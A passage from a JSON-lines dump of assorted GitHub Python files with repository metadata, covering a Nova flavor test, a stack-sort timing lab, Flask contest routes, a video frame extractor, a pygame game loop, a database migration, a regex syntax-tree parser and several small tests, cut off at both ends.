instance type query returned\n by sqlalchemy and returns it as a dictionary, converting the\n extra_specs entry from a list of dicts:\n 'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]\n to a single dict:\n 'extra_specs' : {'k1': 'v1'}\n \"\"\"\n inst_type_dict = dict(inst_type_query)\n extra_specs = dict([(x['key'], x['value'])\n for x in inst_type_query['extra_specs']])\n inst_type_dict['extra_specs'] = extra_specs\n return inst_type_dict\n\ndef _flavor_get_query(context, session=None, read_deleted=None):\n query = model_query(context, models.InstanceTypes, session=session,\n read_deleted=read_deleted)\n if not context.is_admin:\n the_filter = [models.InstanceTypes.is_public == True]\n the_filter.extend([\n models.InstanceTypes.projects.any(project_id=context.project_id)\n ])\n query = query.filter(or_(*the_filter))\n return query\n\ndef flavor_get_by_flavor_id(context, flavor_id, read_deleted):\n \"\"\"Returns a dict describing specific flavor_id.\"\"\"\n result = _flavor_get_query(context, read_deleted=read_deleted).\\\n filter_by(flavorid=flavor_id).\\\n order_by(asc(\"deleted\"), asc(\"id\")).\\\n first()\n if not result:\n raise Exception(\"plop\")\n return _dict_with_extra_specs(result)\n\n\nclass Context(object):\n def __init__(self, project_id, user_id):\n self.project_id = project_id\n self.user_id = user_id\n self.is_admin = True\n\n\nif __name__ == '__main__':\n\n logging.getLogger().setLevel(logging.DEBUG)\n\n context = Context(\"admin\", \"admin\")\n\n # print(flavor_get_by_flavor_id(context, '42', 'no'))\n print(flavor_get_by_flavor_id(context, u'42', 'no'))\n","repo_name":"BeyondTheClouds/rome","sub_path":"test/nova/methods/test_flavor_get_by_flavor_id.py","file_name":"test_flavor_get_by_flavor_id.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"36394223833","text":"from sys import maxsize\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport time\nimport sys\nfrom scipy.interpolate import interp1d\nsys.setrecursionlimit(20000)\nfrom scipy.interpolate import make_interp_spline, BSpline\nclass Stack: \n def __init__(self):\n self.stack = [] #1\n\n def isEmpty(self):\n #global nop\n #nop+=3\n return len(self.stack) == 0 #3\n\n def push(self, item):\n #global nop\n #nop+=2\n return self.stack.append(item) #2\n\n def pop(self):\n #global nop\n #nop+=9\n if self.isEmpty(): #4\n return str(-maxsize - 1) #3\n return self.stack.pop() #2\n\n def peek(self):\n #global nop\n #nop+=9\n if self.isEmpty(): #4\n return self.stack #1\n return self.stack[len(self.stack) - 1] #4\n\n def sort(self):\n #global nop\n #nop+=7\n if self.isEmpty() != True: #4\n x = self.stack.pop() #2\n self.sort()\n self.insert(self.stack, x) #n + n + 6\n return self.stack #1\n\n def insert(self, stack, x):\n #global nop\n if len(stack) > 0: # 2\n #nop+=6\n y = self.stack[-1] #2\n if x < y: #1\n self.stack.pop() #1\n self.insert(self.stack, x)\n self.push(y) #2\n else:\n self.push(x) #2\n\n else:\n #nop+=1\n self.stack.append(x) #1\n\nstack = Stack()\nd = np.random.randint(0, 100, size=25)\n\nfor i in list(d):\n stack.push(i)\n\nprint(stack.stack)\nprint(\"===\")\nprint(stack.sort())\n#Код для вывода графика\n\n\nn = [10,50,100,500,1000,2500,5000,7000,10000]\ndef filler(count):\n d = np.random.randint(0, 100, size=count)\n s = Stack()\n for i in d:\n s.push(i)\n return s\n\ntimey = []\nnop_arr = []\nfor i in n:\n x = filler(i)\n st = time.monotonic()\n x.sort()\n timey.append((time.monotonic() - st))\nplt.figure(figsize=(12, 7))\n\nn = np.array(n)\ntimey = np.array(timey)\n\n\nxnew = np.linspace(n.min(), n.max(), 300) \nspl = make_interp_spline(n, timey, k=3) # type: BSpline\npower_smooth = spl(xnew)\nplt.grid(True)\nplt.plot(xnew, power_smooth, label=\"dependence\")\nplt.title(\"Т(n)\")\nplt.xlabel(\"Array size\")\nplt.ylabel(\"milliseconds \")\nplt.legend()\nplt.show()\n\n\n","repo_name":"GlamorousCar/mirea_edu","sub_path":"laba1.py","file_name":"laba1.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20473001460","text":"from flask import current_app as app\nfrom flask import render_template, redirect, url_for, request, abort\nfrom flask_login import current_user, login_required\nfrom flask_breadcrumbs import register_breadcrumb\nfrom sqlalchemy import desc\n\nfrom app import db\nfrom app.blueprints.problems import problems\nfrom app.models import Grade, Topic, Submission\nfrom app.contester.languages import languages\nfrom app.utils.routes import grade_compliance_required, admin_required\nfrom app.utils.db import get_task\nimport app.utils.breadcrumbs as bc\n\n\n@problems.route('/redirect', methods=['GET'])\n@login_required\ndef redirect_page():\n if current_user.is_admin:\n return redirect(url_for('problems.all_grades_page'))\n return redirect(url_for('problems.grade_page', grade_number=current_user.grade.number))\n\n\n@problems.route('/', methods=['GET'])\n@login_required\n@admin_required\ndef all_grades_page():\n return render_template('problems/all_grades.html', title='Все классы', grades=db.session.query(Grade).all())\n\n\n@problems.route('/grade-', methods=['GET'])\n@register_breadcrumb(problems, '.grade', '', dynamic_list_constructor=bc.view_grade_dlc)\n@login_required\n@grade_compliance_required\ndef grade_page(grade_number):\n grade = db.session.query(Grade).filter(Grade.number == grade_number).first_or_404()\n topics = grade.topics.all()\n\n context = {\n 'grade': grade,\n 'topics': topics,\n }\n\n return render_template('problems/grade.html', title=f'{grade.number} класс', **context)\n\n\n@problems.route('/grade-/', methods=['GET'])\n@register_breadcrumb(problems, '.grade.topic', '', dynamic_list_constructor=bc.view_topic_dlc)\n@login_required\n@grade_compliance_required\ndef topic_page(grade_number, topic_translit_name):\n grade = db.session.query(Grade).filter(Grade.number == grade_number).first_or_404()\n topic = db.session.query(Topic).filter(Topic.translit_name == topic_translit_name).first_or_404()\n tasks = topic.tasks.all()\n print(tasks)\n\n context = {\n 'grade': grade,\n 'topic': topic,\n 'tasks': tasks\n }\n return render_template('problems/topic.html', title=topic.name, **context)\n\n\n@problems.route(\n '/grade-//',\n defaults={'tab': 'problem'},\n methods=['GET']\n)\n@problems.route(\n '/grade-///',\n methods=['GET']\n)\n@register_breadcrumb(problems, '.grade.topic.task', '', dynamic_list_constructor=bc.view_task_dlc)\n@login_required\n@grade_compliance_required\ndef task_page(grade_number, topic_translit_name, task_translit_name, tab):\n task = get_task(grade_number, topic_translit_name, task_translit_name)\n topic = task.topic\n\n global_context = {\n 'task': task,\n 'topic': topic,\n }\n\n page = request.args.get('table_page', type=int, default=1)\n\n if tab == 'problem':\n # Tab with problem (name, condition, editor etc)\n local_context = {\n 'language_dict': languages.dictionary\n }\n return render_template(\n 'problems/tabs/problem.html',\n title=f'{task.name} - Задача',\n **global_context,\n **local_context\n )\n\n elif tab == 'submissions':\n # Tab with user's submissions\n local_context = {\n 'submissions': current_user.submissions.filter(\n Submission.task_id == task.id\n ).paginate(\n per_page=app.config['RECORDS_PER_PAGE'], page=page, error_out=False\n )\n }\n return render_template(\n 'problems/tabs/submissions.html',\n title=f'{task.name} - Мои отправки',\n **global_context,\n **local_context\n )\n\n elif tab == 'all-submissions':\n # Tab with all submissions\n if current_user.is_admin:\n local_context = {\n 'submissions': task.submissions.order_by(\n desc(Submission.submission_date)\n ).paginate(\n per_page=app.config['RECORDS_PER_PAGE'], page=page, error_out=False\n ),\n 'show_users': True\n }\n return render_template(\n 'problems/tabs/all_submissions.html',\n title=f'{task.name} - Все отправки',\n **global_context,\n **local_context\n )\n\n abort(403)\n\n abort(404)\n","repo_name":"S1riyS/CONTESTER","sub_path":"app/blueprints/problems/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27088249462","text":"import cv2\n\n\ndef convert_video_to_images(video_path, output_folder, num_images):\n # Open the video file\n video = cv2.VideoCapture(video_path)\n\n # Get the total number of frames in the video\n total_frames = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Calculate the frame interval to extract the desired number of images\n frame_interval = total_frames // num_images\n\n # Initialize a counter for the extracted images\n image_count = 0\n frame_count = 0\n\n # Loop through the frames and extract images at the specified interval\n while video.isOpened():\n ret, frame = video.read()\n\n if not ret:\n break\n\n # Extract an image every frame_interval frames\n if image_count <= total_frames:\n image_path = f\"{output_folder}/image_{image_count}.png\"\n cv2.imwrite(image_path, frame)\n image_count += 1\n else:\n break\n # Break the loop if the desired number of images has been extracted\n # if image_count == num_images:\n # break\n\n # Release the video file\n video.release()\n\n\n# Usage example\nvideo_path = \"D:\\\\work\\\\convert-files\\\\黄金88免费游戏.mp4\"\noutput_folder = \"D:\\\\work\\\\convert-files\\\\video_frames\\\\slot-216\"\nnum_images = 100 # Change the number of images to 1\n\nconvert_video_to_images(video_path, output_folder, num_images)\n","repo_name":"sfzhanglimin/simple_tools","sub_path":"convertVideoToImages.py","file_name":"convertVideoToImages.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73769667922","text":"\"\"\"HexaMine is a game where you have to find the mines in a hexagonal grid.\"\"\"\n\n# \n\nfrom __future__ import annotations\n\n__version__ = 'beta-1.2.0'\n\nfrom dataclasses import dataclass, field\nfrom typing import ClassVar\n\nimport pygame\n\nfrom game import Game\n\n\nWINDOW_FLAGS = pygame.RESIZABLE\n\n\n@dataclass\nclass Main:\n TPS: ClassVar[int] = 60\n x_size: int = 800\n y_size: int = 600\n\n number_tick: int = field(init=False, default=0)\n\n @property\n def x_center(self) -> int:\n return self.x_size // 2\n\n @property\n def y_center(self) -> int:\n return self.y_size // 2\n\n def main(self) -> None:\n pygame.init()\n logo = pygame.image.load('assets/logo.png')\n pygame.display.set_icon(logo)\n pygame.display.set_caption(f'HexaMine {__version__}')\n canvas = pygame.display.set_mode((self.x_size, self.y_size), WINDOW_FLAGS)\n clock = pygame.time.Clock()\n\n game = Game(self, canvas)\n game.run_menu()\n\n while True:\n self.number_tick += 1\n clock.tick(self.TPS)\n game.tick_loop()\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n return\n if event.type == pygame.VIDEORESIZE:\n self.x_size = event.w\n self.y_size = event.h\n # while we would love to have a minimum size, that literally does not work in pygame\n game.handle_event(event)\n\n\nif __name__ == '__main__':\n Main().main()\n","repo_name":"greatericontop/HexaMine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43024613844","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nDefault hosting mode to pypi-only\n\nRevision ID: 10cb17aea73\nRevises: 41abd35caa3\nCreate Date: 2015-09-03 01:18:55.288971\n\"\"\"\n\nfrom alembic import op\n\nrevision = \"10cb17aea73\"\ndown_revision = \"41abd35caa3\"\n\n\ndef upgrade():\n op.alter_column(\n \"packages\",\n \"hosting_mode\",\n server_default=\"pypi-only\",\n existing_server_default=\"pypi-explicit\",\n )\n\n\ndef downgrade():\n op.alter_column(\n \"packages\",\n \"hosting_mode\",\n server_default=\"pypi-explicit\",\n existing_server_default=\"pypi-only\",\n )\n","repo_name":"pypi/warehouse","sub_path":"warehouse/migrations/versions/10cb17aea73_default_hosting_mode_to_pypi_only.py","file_name":"10cb17aea73_default_hosting_mode_to_pypi_only.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"22014683579","text":"import typing\nfrom base import *\nfrom Lexer import Lexer, Token\n\n\nclass Node:\n pass\n\nFollowPos = typing.NewType('FollowPos', typing.Dict[Node, typing.Set[Node]])\n\nclass Node:\n root: Node\n nodes: typing.List[Node]\n value: Token\n groups: typing.List[int]\n firstposes: typing.Set[Node]\n lastposes: typing.Set[Node]\n nullables: bool or None\n \n\n def __init__(\n self, \n root: Node=None,\n value: Token=None):\n self.root = root\n self.value = value\n self.nodes = []\n self.groups = []\n self.firstposes = -1\n self.lastposes = -1\n self.nullables = -1\n \n \n def add(self, value: Token) -> Node:\n node = Node(self, value)\n self.nodes.append(node)\n return node\n\n def pop(self):\n return self.nodes.pop()\n\n def add_node(self, node: Node):\n node.root = self\n self.nodes.append(node)\n\n @property\n def last(self):\n return self.nodes[-1]\n\n @property\n def lvl(self):\n if self.root is None:\n return 0\n return self.root.lvl + 1\n\n @property\n def isNotEmpty(self):\n return not not self.nodes\n\n def leftRoot(self):\n if not self.nodes:\n yield self\n for n in self.nodes:\n n.leftRoot()\n\n def optLeftRoot(self):\n go = [t for t in self.nodes]\n while go:\n tmp = go.pop(0)\n yield tmp\n go = tmp.nodes + go\n\n def printTree(self):\n for t in self.optLeftRoot():\n print(t)\n\n def copy(self):\n return Node(self.root, self.value)\n\n def __str__(self) -> str:\n return f\"(lvl={self.lvl} id={id(self)} p={id(self.root) if self.root else self.root} v={self.value}) g={self.groups}\"\n \n def __repr__(self) -> str:\n return f\"(lvl={self.lvl} id={id(self)} p={id(self.root) if self.root else self.root} v={self.value}) g={self.groups}\"\n \n def genDot(self, outFile='graph'):\n s = \"digraph G {\"\n ids = set()\n obhod = [t for t in self.optLeftRoot()]\n for t in obhod:\n if t.root.value is not None:\n if id(t.root) not in ids:\n val = t.value.value\n if len(val) == 2:\n val = r'\\\\' + val\n s += f\"{id(t.root)} [label=\\\"{val}\\\"]; \"\n # s += f\"{id(t.root)} [label=\\\"{id(t.root)}\\\"]; \"\n \n ids.add(id(t.root))\n if id(t) not in ids:\n val = t.value.value\n if len(val) == 2:\n val = r'\\\\' + val\n s += f\"{id(t)} [label=\\\"{val}\\\"]; \"\n # s += f\"{id(t)} [label=\\\"{id(t)}\\\"]; \"\n ids.add(id(t))\n for t in obhod:\n if t.root.value is not None:\n s += f\"{id(t.root)} -> {id(t)}; \"\n s += \"}\"\n with open(f'./{outFile}.dot', 'w') as out:\n out.write(s)\n import subprocess\n subprocess.call(['dot', '-Tpng', f'./{outFile}.dot', '-o', f'{outFile}.png'])\n\n def copyTree(self):\n nodes = [self] + [i for i in self.optLeftRoot()]\n news = [Node() for i in range(len(nodes))]\n head = news[0]\n fc = True\n for i,n in enumerate(nodes):\n if fc:\n print(nodes[0], nodes[1])\n news[i].value = Token(n.value.tag, n.value.value)\n fc = False\n else:\n j = nodes.index(n.root)\n news[i].root = news[j]\n news[i].value = Token(n.value.tag, n.value.value)\n for node in n.nodes:\n j = nodes.index(node)\n news[i].add_node(news[j])\n h = Node()\n h.add_node(head)\n head = h\n return head\n\n def addEnd(self):\n tmp = Node(None, Token(CONCAT, '.'))\n ch = self.pop()\n tmp.add_node(ch)\n tmp.add(Token(END_MEAT, '\\$'))\n self.add_node(tmp)\n\n def checkLeft(self):\n self.printTree()\n self.genDot(\"check.png\")\n\n def prenullable(self):\n if self.value is None:\n return False\n if self.value.tag == META_NUM:\n # return False # True\n return True\n elif self.value.tag == CONCAT or self.value.tag == OR:\n return self.nodes[0].prenullable() and self.nodes[1].prenullable()\n elif self.value.tag == GROUP_BRACKET or self.value.tag == SQ_BRACKET:\n if self.nodes:\n return self.nodes[0].prenullable()\n else:\n return True\n else:\n return False\n\n def nullable(self):\n if self.nullables == -1:\n if self.prenullable():\n self.nullables = None\n else:\n if self.value.tag == EMPTY or self.value.tag == KLINI:\n self.nullables = True\n elif self.value.tag == OR:\n self.nullables = self.nodes[0].nullable() or self.nodes[1].nullable()\n elif self.value.tag == CONCAT:\n self.nullables = self.nodes[0].nullable() and self.nodes[1].nullable()\n elif self.value.tag == GROUP_BRACKET or self.value.tag == REPEATS or self.value.tag == SQ_BRACKET:\n self.nullables = self.nodes[0].nullable()\n else:\n self.nullables = False\n return self.nullables\n\n def firstpos(self):\n if self.firstposes == -1:\n if self.prenullable():\n self.firstposes = None\n else:\n if self.value.tag == EMPTY:\n self.firstposes = set()\n elif self.value.tag == KLINI:\n self.firstposes = self.nodes[0].firstpos()\n elif self.value.tag == OR:\n node0 = self.nodes[0].firstpos()\n node1 = self.nodes[1].firstpos()\n if node0 is None:\n self.firstposes = node1\n if node1 is None:\n self.firstposes = node0\n self.firstposes = node0 | node1 \n elif self.value.tag == CONCAT:\n node0 = self.nodes[0].firstpos()\n node1 = self.nodes[1].firstpos()\n if node0 is None:\n self.firstposes = node1\n if node1 is None:\n self.firstposes = node0\n if self.nodes[0].nullable():\n self.firstposes = node0 | node1\n else:\n self.firstposes = node0\n elif self.value.tag == GROUP_BRACKET or self.value.tag == REPEATS or self.value.tag == SQ_BRACKET:\n # if self.prenullable():\n # self.firstposes = None\n self.firstposes = self.nodes[0].firstpos()\n else:\n self.firstposes = set([id(self)])\n return self.firstposes\n\n def lastpos(self):\n if self.lastposes == -1:\n if self.prenullable():\n self.lastposes = None\n else:\n if self.value.tag == EMPTY:\n self.lastposes = set()\n elif self.value.tag == KLINI:\n self.lastposes = self.nodes[0].lastpos()\n elif self.value.tag == OR:\n node0 = self.nodes[0].lastpos()\n node1 = self.nodes[1].lastpos()\n if node0 is None:\n self.lastposes = node1\n if node1 is None:\n self.lastposes = node0\n self.lastposes = node0 | node1 \n elif self.value.tag == CONCAT:\n node0 = self.nodes[0].lastpos()\n node1 = self.nodes[1].lastpos()\n if node0 is None:\n self.lastposes = node1\n if node1 is None:\n self.lastposes = node0\n if self.nodes[1].nullable():\n self.lastposes = node0 | node1\n else:\n self.lastposes = node1\n elif self.value.tag == GROUP_BRACKET or self.value.tag == REPEATS or self.value.tag == SQ_BRACKET:\n # if self.prenullable():\n # self.lastposes = None\n self.lastposes = self.nodes[0].lastpos()\n else:\n self.lastposes = set([id(self)])\n return self.lastposes\n\n\nclass SyntaxTree:\n root_stack: typing.List[Node]\n lexer: Lexer\n followposes: FollowPos\n root: Node\n root_null: Node\n ids: typing.Dict[int, Node]\n _functors = dict\n _joiner: Node\n _df_joiner: Node\n _groups_num: int\n _sq_num: int\n _OROR: list\n\n def __init__(self):\n self.lexer = Lexer()\n self._functors = {\n GROUP_BRACKET: self.op_group_brackets,\n SQ_BRACKET: self.op_sq_brackets,\n REPEATS: self.op_uno_left,\n OR: self.change_joiner,\n KLINI: self.op_uno_left,\n META: self.op_binary_join,\n META_NUM: self.op_meta_num,\n CHAR: self.op_binary_join,\n EMPTY: self.op_binary_join\n }\n self.clear()\n\n def __join(self, n1: Node, n2: Node, root: Node):\n self._joiner.add_node(n1)\n self._joiner.add_node(n2)\n root.add_node(self._joiner)\n self._joiner = self._df_joiner.copy()\n\n def __root_concat(self, n1: Node, n2: Node):\n if n1.isNotEmpty:\n ch = n1.pop()\n self.__join(ch, n2, n1)\n else:\n n1.add_node(n2)\n\n def _isOpenBracket(self, t: Token):\n return t.value in \"([\"\n\n def op_brackets(self, t: Token):\n if self._isOpenBracket(t):\n tmp = Node(None, t)\n self.__root_concat(self.root_stack[-1], tmp)\n self.root_stack.append(tmp)\n return None\n else:\n t2 = self.root_stack.pop()\n while t2.value.tag == TMP_TOKEN:\n troot = t2.root\n troot.pop()\n troot.add_node(t2.pop())\n t2 = self.root_stack.pop()\n return t2\n\n def op_group_brackets(self, t: Token):\n tmp = self.op_brackets(t)\n if tmp:\n self._OROR.pop()\n self._groups_num += 1\n tmp.value = Token(GROUP_BRACKET, f\"gr_{self._groups_num}\")\n else:\n self._OROR.append(self.root_stack[-1])\n \n def op_sq_brackets(self, t: Token):\n tmp = self.op_brackets(t)\n if self._df_joiner.value.tag == CONCAT:\n self._df_joiner = Node(None, Token(OR, '|'))\n else:\n self._df_joiner = Node(None, Token(CONCAT, '.'))\n self._joiner = self._df_joiner.copy()\n if tmp:\n self._sq_num += 1\n tmp.value = Token(SQ_BRACKET, f\"sq_{self._sq_num}\")\n if not tmp.nodes:\n tmp.add(Token(EMPTY, '#'))\n # root = tmp.root\n # root.nodes.remove(tmp)\n # root.add_node(tmp.pop())\n # else:\n # self.op_binary_join(Token(EMPTY, '#'))\n\n def op_uno_left(self, t: Token):\n ch = self.root_stack[-1].pop()\n if ch.nodes:\n ch2 = ch.pop()\n tmp = ch.add(t)\n tmp.add_node(ch2)\n self.root_stack[-1].add_node(ch)\n else:\n tmp = self.root_stack[-1].add(t)\n tmp.add_node(ch)\n\n def op_binary_join(self, t: Token):\n tmp = self.root_stack[-1]\n if tmp.isNotEmpty:\n self.__join(tmp.pop(), Node(None, t), tmp)\n else:\n self.root_stack[-1].add(t)\n\n def op_meta_num(self, t: Token):\n val = int(t.value)\n if val > self._groups_num:\n raise PatternError('group index out off range')\n self.op_binary_join(Token(t.tag, t.value + '/'))\n\n def change_joiner(self, t: Token):\n if t.tag == OR:\n if self._OROR:\n n1 = self._OROR.pop()\n if n1.isNotEmpty:\n n2 = Node(None, Token(TMP_TOKEN, 'TMP'))\n ch = n1.pop()\n _joiner = Node(None, t)\n _joiner.add_node(ch)\n _joiner.add_node(n2)\n n1.add_node(_joiner)\n self.root_stack.append(n2)\n self._OROR.append(n2)\n \n else:\n n1 = self.root_stack[-1]\n if n1.isNotEmpty:\n n2 = Node(None, Token(TMP_TOKEN, 'TMP'))\n ch = n1.pop()\n _joiner = Node(None, t)\n _joiner.add_node(ch)\n _joiner.add_node(n2)\n n1.add_node(_joiner)\n self.root_stack.append(n2)\n self._OROR.append(_joiner)\n else:\n raise AttributeError(\"OR_TOKEN\")\n\n def clear(self):\n self.root_stack = [Node()]\n self._df_joiner = Node(None, Token(CONCAT, '.'))\n self._joiner = self._df_joiner.copy()\n self._groups_num = 0\n self._sq_num = 0\n self.followposes = dict()\n self.ids = dict()\n self.root = None\n self._OROR = []\n self.lexer.clear()\n\n def build(self, s: str):\n gen = self.lexer.lex(s)\n for t in gen:\n self._functors[t.tag](t)\n\n if len(self.root_stack) > 1:\n raise PatternError(\"syntax tree\")\n self.root_null = self.root_stack[0]\n self.root = self.root_stack[0].nodes[0]\n # self.addGroups()\n return self.root\n\n def __addFP(self, i: Node, s: typing.Set[Node]):\n if i in self.followposes:\n self.followposes[i] = (self.followposes[i] | s)\n else:\n self.followposes[i] = s\n\n def genFollowposes(self):\n root = self.root_stack[0].nodes[0]\n for n in root.optLeftRoot():\n self.ids[id(n)] = n\n n.firstpos()\n n.lastpos()\n \n for n in root.optLeftRoot():\n if n.value.tag == CONCAT: \n for i in n.nodes[0].lastposes:\n self.__addFP(i, n.nodes[1].firstposes)\n elif n.value.tag == KLINI or n.value.tag == REPEATS: #or n.value.tag == GROUP_BRACKET \n for i in n.nodes[0].lastposes:\n self.__addFP(i, n.firstposes)\n return self.followposes, self.ids \n\n def _addGroups(self, groups: list, node):\n if node.value.tag == GROUP_BRACKET:\n groups.append(int(node.value.value[3:]))\n node.groups = groups\n for n in node.nodes:\n self._addGroups(groups.copy(), n)\n \n def addGroups(self):\n self._addGroups([], self.root)\n return self.root\n\nif __name__ == '__main__':\n tree = SyntaxTree()\n # test = r\"n[as\\{]\"\n # test = r\"asd*((geg)[]([123\\{\\]]*)){3}\"\n test = r\"(12)|b\"\n test = r\"(a|b)*abb\\$\"\n test = r\"(ba{5}){2}\"\n test = r\"[ab]{3}\"\n test = r\"[]\"\n # test = r\"ab{3}\"\n test = r\"(aba[abc]){3}\\$\"\n\n test = r\"(na*)\\1\\$\"\n # test = r\"(aba(a|b|c)){3}\\$\"\n \n # test = r\"(cab){3}\"\n \n # test = r\"(nana)|((n*[a]){3})\"\n # test = r\"(n[a])\"\n # test = r\"asd*(nad)|((cur\\{))as[123]{6}[]\\#\\2\"\n # test = r\"a|b|c|([123456]*)\"\n test = r\"(a|b)*abb\\#\"\n # test = r\"[123]\"\n # test = r\"(a|b)*abb\\#\\123123\"\n # test = r\"[]\"\n test = r\"xy|z*\"\n test = r\"(01)*|(10)*\"\n test = r\"abc*|deb[123]|kick|pick\"\n # test = r\"a*a(a[bc])*\"\n treelist = tree.build(test)\n # treelist.printTree()\n\n tree.root_null.genDot()\n # print('check')\n # tree.root_null.checkLeft()\n # print('endcheck')\n # print(*tree.genFollowposes(), sep='\\n\\n')\n\n h = tree.root.nodes[0].nodes[1]\n print(h)\n h2 = h.copyTree()\n h2.addEnd()\n h2.genDot(\"graph2\")\n # for k in tree.followposes:\n # print(tree.ids[k])\n # for k in treelist.optLeftRoot():\n # # print(tree.ids[k])\n # print(k)\n # print(k.firstpos(), k.lastpos(), sep='\\t')\n","repo_name":"KPEdit/AT_lab2","sub_path":"lib/SyntaxTree.py","file_name":"SyntaxTree.py","file_ext":"py","file_size_in_byte":13822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23015543800","text":"#!/usr/bin/env python\n\nimport sys, os\nimport unittest\nimport subprocess\nimport tempfile\nimport shutil\n\nsys.path.append(os.path.join(\"..\", \"lib\"))\nimport utils\n\nclass TestInstallGit(utils.ConfigInstallTest):\n @unittest.skipIf(os.getenv(\"IS_AZURE_PIPELINE\") == '1',\n \"Azure pipline has custom gitconfig\")\n def test_config(self):\n Home = os.environ[\"HOME\"]\n PkgDir = os.path.dirname(__file__)\n self.checkLinks(os.path.join(PkgDir, \"files\"), \"\", Home)\n\n @unittest.skipIf(os.getenv(\"IS_AZURE_PIPELINE\") == '1',\n \"Azure pipline has custom gitconfig\")\n def test_graph(self):\n Pwd = os.getcwd()\n Tmp = os.environ[\"TMPDIR\"]\n RepoDir = tempfile.mkdtemp()\n Env = dict(HOME=os.environ[\"HOME\"], TERM=\"xterm\")\n os.chdir(RepoDir)\n subprocess.check_call([\"git\", \"init\"])\n self.assertEqual(subprocess.call([\"git\", \"graph\"], env=Env), 0)\n shutil.rmtree(RepoDir)\n os.chdir(Pwd)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MetroWind/dotfiles-mac","sub_path":"git/test-mac.py","file_name":"test-mac.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"36584947448","text":"from flask import Flask, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef root():\n data = {\n \"nama\" : \"bintang\"\n }\n return jsonify(data)\n\nif \"__main__\" == __name__:\n app.run(host=\"0.0.0.0\", port=1000)","repo_name":"strongpapazola/unusia","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17877797132","text":"import random\nimport numpy as np\n\nfrom FCSCPA import ball_in_bowl, Ymn_Leibniz_matAB, demo_Ymn_Leibniz, demo_Ymn_Binomial, Ymn_electron_zeroK\n\nhfe = lambda x,y: np.max(np.abs(x-y)/(np.abs(x)+np.abs(y)+1e-3))\n\n\ndef test_ball_in_bowl():\n def hf1(x0, x1):\n ret0 = []\n ret1 = []\n for y1,y2 in ball_in_bowl(x0, x1):\n ret0.append(y1)\n ret1.append(y2)\n return ret0, ret1\n tmp1,tmp2 = hf1(0, 3)\n assert [] == tmp1\n assert [] == tmp2\n\n tmp1,tmp2 = hf1(3, 1)\n assert [(3,)] == tmp1\n assert [(0,0,0,1)] == tmp2\n\n tmp1,tmp2 = hf1(3, 2)\n assert [(0,3),(1,2),(2,1),(3,0)] == tmp1\n assert [(1,0,0,1),(0,1,1,0),(0,1,1,0),(1,0,0,1)] == tmp2\n\n\ndef test_Ymn_Leibniz_matAB():\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 1)\n assert hfe(np.array([1]), tmp1) < 1e-7\n assert [[1,0]] == tmp2.tolist()\n\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 2)\n assert hfe(np.array([1]), tmp1) < 1e-7\n assert [[0,1]] == tmp2.tolist()\n\n tmp1,tmp2 = Ymn_Leibniz_matAB(2, 4)\n assert hfe(np.array([6,8]), tmp1) < 1e-7\n assert [[0,2],[2,0]] == tmp2.tolist()\n\n\ndef test_Ymn():\n fL = random.uniform(0, 1)\n fR = random.uniform(0, 1)\n for m in range(1, 7):\n for n in range(1, 7):\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'electron')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 'electron')\n assert abs(tmp1-tmp2) < 1e-7\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'phonon')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 'phonon')\n assert abs(tmp1-tmp2) < 1e-7\n\n\ndef test_Ymn_electron_zeroK():\n ground_truth = [\n (1, [1]),\n (2, [1,2]),\n (3, [1,6,6]),\n (4, [1,14,36,24]),\n (5, [1,30,150,240,120]),\n ]\n for x,ret_ in ground_truth:\n ret = Ymn_electron_zeroK(x)\n assert np.all(np.array(ret_)==ret)\n","repo_name":"kaituohuo/FCSCPA","sub_path":"tests/test_Ymn_utils.py","file_name":"test_Ymn_utils.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36683476932","text":"import io\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nimport serial\n\nser = serial.Serial(\n port = \"COM3\", \n baudrate= 57600, \n parity = serial.PARITY_NONE,\n stopbits = serial.STOPBITS_ONE,\n bytesize = serial.EIGHTBITS,\n timeout = 10\n )\n\n\ndef bytes_receive():\n 